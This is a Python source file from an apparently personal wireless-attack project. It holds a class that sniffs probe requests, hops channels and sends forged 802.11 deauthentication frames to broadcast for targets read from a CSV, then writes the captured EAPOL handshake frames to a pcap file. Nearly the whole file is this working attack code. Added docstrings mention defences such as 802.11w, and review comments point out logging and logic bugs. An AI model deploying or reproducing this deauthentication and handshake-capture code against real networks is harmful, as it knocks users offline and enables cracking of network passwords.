crouching_tiger/ctiger/attack.py
anoduck f2c940ae37 feat(Features): 🚧 Hidden Dragon Work
Many changes performed in development of Hidden Dragon

hdragon command is broken for development
2024-03-12 18:03:38 -04:00


# Copyright (c) 2024 Anoduck
#
# This software is released under the MIT License.
# https://opensource.org/licenses/MIT
from scapy.sendrecv import AsyncSniffer
from scapy.sendrecv import sendp
from scapy.layers.dot11 import Dot11
from scapy.layers.dot11 import RadioTap
from scapy.layers.dot11 import Dot11Deauth
from scapy.layers.eap import EAPOL
from scapy.utils import PcapWriter
from random import choice
import pandas as pd
from .dataframe import CtigerDataFrame
from time import sleep
import os
import threading
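class Attack:
    """Capture workflow for 802.11 handshakes on a monitor-mode interface.

    The methods sniff probe requests, hop channels with ``iw``, transmit
    Dot11Deauth frames addressed to the broadcast MAC, and append sniffed
    frames to ``ctiger_handshake.pcap``.

    Defensive context: deauthentication frames forged this way are rejected
    by stations that negotiated Protected Management Frames (IEEE 802.11w),
    and a wireless IDS can alert on deauthentication frames addressed to
    ff:ff:ff:ff:ff:ff.
    """

    # NOTE(review): block nesting below was reconstructed; the reviewed copy
    # of this file carried no indentation. Confirm against the repository.
    # NOTE(review): the log calls pass extra positional arguments without
    # %-placeholders. If `log` is a stdlib logging.Logger these calls report
    # a formatting error instead of the intended message -- confirm the
    # logger type before relying on this output as an audit trail.

    def sniff_stop(self, pkt):
        """Stop-filter callback: record *pkt* and report whether to stop.

        Every packet is appended to ``ctiger_handshake.pcap`` in the current
        working directory. The module-global ``hndshk_frag`` is set to 0 at
        the start of each call, incremented when the packet has an EAPOL
        layer, and zeroed otherwise.

        Returns:
            True when ``hndshk_frag`` is at least 10, otherwise None.
        """
        global hndshk_frag
        hndshk_frag = 0
        # A new PcapWriter is opened for every packet and is not closed here.
        pktdmp = PcapWriter('ctiger_handshake.pcap', append=True, sync=True)
        pktdmp.write(pkt)
        if EAPOL in pkt:
            hndshk_frag += 1
        else:
            hndshk_frag = 0
        if hndshk_frag >= 10:
            hndshk_frag = 0
            return True

    def feed_gather(self, mon_dev, targ, lock):
        """Loop forever: start a sniffer, then transmit two Dot11Deauth frames.

        Args:
            mon_dev: Interface name handed to AsyncSniffer and sendp.
            targ: Value placed in addr2 and addr3 of both frames.
            lock: Lock held for the whole of each iteration.

        Both frames use the broadcast address as addr1. The first header
        carries management subtype 4 (Probe Request in 802.11) and the second
        subtype 12 (Deauthentication); both carry a Dot11Deauth layer.
        The method never returns and starts a new AsyncSniffer on each pass.
        """
        while True:
            with lock:
                fg_asf = AsyncSniffer(stop_filter=self.sniff_stop,
                                      iface=mon_dev, monitor=True)
                self.log.info('Starting pkt gather')
                fg_asf.start()
                # log.info('Setting mon_dev channel to ', channel)
                pkt = RadioTap()/Dot11(type=0, subtype=4,
                                       addr1="ff:ff:ff:ff:ff:ff",
                                       addr2=targ, addr3=targ)/Dot11Deauth()
                self.log.debug('sending deauth to ', targ, ' with type 4')
                sendp(pkt, iface=mon_dev, verbose=0)
                pkt = RadioTap()/Dot11(type=0, subtype=12,
                                       addr1="ff:ff:ff:ff:ff:ff", addr2=targ,
                                       addr3=targ)/Dot11Deauth()
                self.log.debug('sending deauth to ', targ, ' with type 12')
                sendp(pkt, iface=mon_dev, verbose=0)

    def grab_macs(self, pkt):
        """Per-packet sniffer callback returning a probe request's sender MAC.

        Returns:
            ``pkt.addr2`` when the packet has a Dot11 layer, is a management
            frame (type 0) of subtype 4 (Probe Request) and ``pkt.info`` is
            not the empty string; otherwise None.
        """
        if pkt.haslayer(Dot11):
            if pkt.type == 0 and pkt.subtype == 4:
                if pkt.info != '':
                    self.log.debug('mac: ', pkt.addr2)
                    return pkt.addr2

    def chan_hopper(self, mon_dev, channels, lock):
        """Loop forever, setting *mon_dev* to a randomly chosen channel.

        Args:
            mon_dev: Interface name passed to ``iw dev <name> set channel``.
            channels: Iterable of channel values; it is de-duplicated,
                sorted, has the element ',' removed and the remainder is
                converted with ``int``.
            lock: Lock held while the channel is set and during the sleep.

        Raises:
            ValueError: If ',' is not an element of *channels*
                (``list.remove``) or an element cannot be converted by
                ``int``.
        """
        # Local import so the file's import block does not need to change.
        import subprocess

        self.log.info('Channel hopper started.')
        chlist = list(set(channels))
        chlist.sort()
        chlist.remove(',')
        chans = [int(chan) for chan in chlist]
        while True:
            with lock:
                ichan = choice(chans)
                # Hardening: the command is passed as an argument vector, so
                # shell metacharacters in mon_dev are never interpreted. The
                # previous form concatenated mon_dev into an os.system()
                # string, which a shell would parse.
                iw_argv = ['iw', 'dev', mon_dev, 'set', 'channel', str(ichan)]
                try:
                    # check=False keeps the old behaviour of ignoring iw's
                    # exit status.
                    subprocess.run(iw_argv, check=False)
                except OSError as exc:
                    # os.system() did not raise when iw could not be started;
                    # keep that best-effort behaviour but leave a trace.
                    self.log.info('iw could not be executed: ' + str(exc))
                self.log.debug('Channel set to ', str(ichan))
                sleep(14.7)
                # return ichan

    def attack(self, mondev, scan_file, net_file, log):
        """Entry point: load targets from CSV and start the worker threads.

        Args:
            mondev: Monitor-mode interface name, stored as ``self.mon_dev``.
            scan_file: CSV path read with ``pd.read_csv(..., index_col=0)``;
                it must provide the columns crypt, ssid, channel and bssid.
            net_file: Stored as ``self.net_file``; not otherwise used here.
            log: Logger stored as ``self.log`` and used by every method.

        The method never returns. Each pass of its loop starts another
        'chopper' thread, and one 'feeder' thread per sniffer result whose
        element [1] satisfies ``in targets``; no thread is joined.
        """
        self.log = log
        self.mon_dev = mondev
        self.scan_file = scan_file
        self.net_file = net_file
        log.info('Beginning Attack')
        targets = pd.read_csv(self.scan_file, index_col=0)
        tpairs = targets.drop(columns=['crypt', 'ssid'])
        pd_chan_list = tpairs.channel.to_list()
        channels = list(set(pd_chan_list))
        log.debug('Channel Type: ', str(type(channels)))
        pd_bssid_list = tpairs.bssid.to_list()
        bssids = list(set(pd_bssid_list))
        log.info('Channel list: ', str(channels))
        log.info('BSSID list: ', str(bssids))
        asniff = AsyncSniffer(iface=self.mon_dev,
                              prn=self.grab_macs,
                              monitor=True, store=False)
        asniff.start()
        log.info('Starting channel hopper')
        # One lock shared by the hopper and feeder threads.
        lock = threading.Lock()
        while True:
            ch_thread = threading.Thread(target=self.chan_hopper,
                                         name='chopper',
                                         args=(self.mon_dev, channels, lock))
            ch_thread.start()
            ares = asniff.results
            if ares is not None:
                for row in ares:
                    # NOTE(review): `targets` is the DataFrame read above;
                    # confirm this membership test compares what is intended.
                    if row[1] in targets:
                        log.info('Found target: ', row[1])
                        fg_thread = threading.Thread(
                            target=self.feed_gather,
                            name='feeder',
                            args=(self.mon_dev, row, lock))
                        fg_thread.start()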